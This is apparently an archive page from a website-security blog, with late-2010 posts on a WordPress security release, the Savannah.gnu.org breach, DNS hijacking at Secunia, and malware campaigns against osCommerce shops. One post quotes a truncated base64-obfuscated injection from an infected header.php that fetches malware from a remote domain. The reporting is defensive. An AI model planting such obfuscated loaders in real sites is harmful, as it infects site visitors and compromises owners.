WordPress 3.0.2 released (security update)

If you’re using WordPress, make sure and update to the latest version (3.0.2) as soon as possible. Especially if you have multiple authors with access to your blog/site.

Details about the security issue fixed:

This maintenance release fixes a moderate security issue that could allow a malicious Author-level user to gain further access to the site, addresses a handful of bugs, and provides some additional security enhancements. Big thanks to Vladimir Kolesnikov for detailed and responsible disclosure of the security issue!

The changes between 3.0.1 and 3.0.2 are pretty small and only these files were modified:

wp-admin/includes/file.php
wp-admin/includes/plugin.php
wp-admin/includes/update-core.php
wp-admin/plugins.php

wp-includes/canonical.php
wp-includes/capabilities.php
wp-includes/comment.php
wp-includes/functions.php
wp-includes/load.php
wp-includes/ms-files.php
wp-includes/version.php


Read More

Savannah.gnu.org hacked and currently offline

We’ve learned that savannah.gnu.org (used as a central code repository for many GNU projects – gcc, etc) has been hacked and is currently offline. They posted some details on their site explaining what is going on: savannah.gnu.org

Savannah is currently down – details to follow.

There’s been a SQL injection leading to leaking of encrypted account passwords, some of them discovered by brute-force attack, leading in turn to project membership access.
We’re reinstalling the system and restoring the data from a safe backup, November 23th circa 12:00 GMT.
Please prepare to recommit your changes since that date.
While effort was made in the past to fix injection vulnerabilities in the Savane2 legacy codebase, it appears this was not enough :/

 
No firm ETA for the return online yet (but during the week).

 
* 2010/11/29 21:30 GMT: access to the base host restored, extracting incremental backup from the 23th
* 2010/11/29 23:30 GMT: finished diagnosing original attack
* 2010/11/30 12:30 GMT: data transfers in progress
* 2010/11/30 13:30 GMT: read-only access to source repositories
* 2010/11/30 14:30 GMT: write access to source repositories
* 2010/11/30 16:30 GMT: data transfers finished
* 2010/11/30 18:00 GMT: access to downloads and GNU Arch

What we’ve learned is the attackers exploited a SQL injection vulnerability, got access to all passwords and probably access to some projects through the exploit. If you have an account at Savannah (and like to re-use passwords), change them as soon as possible.

Yet Another WordPress Security Post – Part One

At the end of October we had the opportunity to attend WordCamp Las Vegas. WordCamp’s are great events organized in various cities/countries by the WordPress community to discuss, learn, and teach all things WordPress. If you’ve never attended one, I highly recommend you do! More than likely, there is already an event near you.

Yet Another WordPress Security Post

John Hawkins, one of the WordCamp Las Vegas organizers, asked if I’d be interested in standing in on a Q&A session after lunch, he said he had some questions for me. Of course I obliged, and we headed off to lunch.

Lunch was great. We then gathered in the main conference hall to field questions. As moderator, when John had an opportunity, he fired off the following question at me:

“What best practices do you recommend be used to secure a WordPress install?”

Read More

Secunia defaced? DNS hijacked?

Secunia is a very popular security company, specialized in vulnerability intelligence, security management, and things like that.

However, yesterday evening, everyone visiting their site received a special “defaced” message (“System down – get babana, hacked by turkguvenligi”):

Secunia defaced

What happened? Did their web servers get hacked?

No, their servers were not hacked. After some analysis, it seems that their DNS was hijacked to point to another location. The first thing pointing to that is that their Whois records were modified yesterday:

Record last updated 11-24-2010 06:49:51 PM
Record expires on 08-16-2017
Record created on 08-16-2002

Domain servers in listed order:
A.NS.SECUNIA.COM 213.150.41.253
B.NS.SECUNIA.COM 213.150.41.254
C.NS.SECUNIA.COM 91.198.117.1
D.NS.SECUNIA.COM 91.198.117.2


Read More

osCommerce attacks and nt07.in, nt06.in, etc

We posted yesterday about a series of attacks against osCommerce sites using some russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.

When they detect an vulnerable site (see previous post by details on that), they drop a backdoor, generally named google*.php that will allow them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d

It is interesting that in addition to give full shell access to the attackers, it also uses http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:

Read More

Continuing attacks against osCommerce sites

We are seeing an increase in the number of osCommerce sites hacked lately, and we recommend anyone using it to take precautions to avoid getting hacked and/or reinfected.

On most of the sites we’ve analyzed so far, the attackers used the file_manager.php vulnerability to hack the site.

If you’re using osCommerce, the first thing you have to do is to install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else: login via FTP or SSH(recommended) to do so

ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php

Once you do that, modify your configure.php to point the admin folder to the new location.

Read More

Google blacklist – No way to request a review for the last two days

We are seeing a big issue on Google for the last few days. Whenever a site got blacklisted, you had the option to request a review after the site was clean. Something like that:

Request blacklist review Google

Read More

Malware update: inininininininin.in (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.

These domains were registered by myid37@gmail.com, which is also involved on other malicious activities (serials-keys.com, wincrack.org, search-crack.org,etc).

The infected sites had a large encoded entry added to the file includes/header.php:

echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…

Which when decoded, calls http://inininininininin.in/in.php to get what malware to present to the end user:

Read More

Alexa top sites – Blacklist for October

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For OCT-2010, the number is pretty standard and similar to previous months. Out of those top 1 million sites, around 3.6 thousand got blacklisted last month (3,683 to be more exact). Out of the top 100k, more than 408 got blacklisted by Google.

Over time, only 711 sites that were blacklisted in previous months are still blacklisted and in their TOP 1 million ranking.

Those are the top 100 sites that got flagged and their respective ranking (You can get the full list here):

One interesting point is that more than 70% of the legitimate sites that got hacked were using outdated software (either Joomla, WordPress, OpenX, etc). If you are a site owner, this is a reminder to keep your site updated.

We will post more details in future posts. If you have any question or comment about it, let us know.